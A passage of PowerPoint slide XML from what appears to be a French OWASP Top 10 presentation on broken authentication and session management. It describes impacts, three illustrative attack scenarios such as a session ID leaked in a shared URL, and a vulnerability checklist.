                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>de gestion de sessions</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> et </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d'authentification (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>e.g</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. comptes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, mots de passe, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>IDs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de session</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>) pour</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> usurper l’identité des utilisateurs.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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Développer correctement un système d'authentification ou de gestion de sessions est difficile. En conséquence, ces schémas personnalisés ont souvent des failles dans des domaines tels la déconnexion, la gestion de mots de passe, l'expiration de session, la fonction "se souvenir de moi", la question secrète, la mise à jour de compte, etc. Trouver de telles failles s'avère parfois difficile, chaque implémentation étant unique.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>De telles failles permettraient la compromission</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> d’une partie voir de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="heavy" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>tous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les comptes. Une fois effectuée, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l'attaquant peut faire tout ce que la victime peut. Les comptes à</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> privilèges </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sont souvent ciblés.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérer la valeur Métier des données ou des fonctions applicatives affectées.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez aussi l</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>'impact commercial dû à une médiatisation de la vulnérabilité.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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7" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>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100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scénarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’attaque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une application de réservation de billets d'avion expose les identifiants de session dans l'URL  par réécriture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/sale/saleitems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;jsessionid=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  2P0OC2JSNDLPSKHCJUN2JV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?dest=Hawaii</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un utilisateur authentifié sur le site veut informer ses amis de la vente. Il envoie le lien ci-dessus sans savoir qu'il fournit aussi son ID de session. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>En cliquant sur le lien, ses amis utiliseront sa session et sa carte de crédit.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>timeouts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de l'application ne sont pas définies correctement. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un utilisateur accède au site via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>un ordinateur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Au lieu de sélectionner "déconnexion", l'utilisateur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ferme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>simplement le navigateur et s'en va. Un attaquant utilise le même navigateur une heure plus tard, et ce navigateur est encore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentifié.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un attaquant interne ou externe obtient un accès à la base des mots de passe du système. Les mots de passe ne sont pas correctement chiffrés, exposant les mots de passe de tous les utilisateurs à l’attaquant.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnérable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>détournement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les actifs de gestion de session comme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont-ils correctement protégés?  Vous êtes vulnérables si:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Défaut de protection des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par hash ou chiffrement lors de leur stockage. Voir A6.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Faiblesse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>des fonctions de gestion de compte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ex: création </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de compte, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>changement de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mot de passe, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>récupération de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mot de passe, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de session faibles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) permettant de deviner ou d’écraser les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposition des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de session dans l'URL. (ex: réécriture)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnérabilité des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de session à l’attaque par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>fixation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
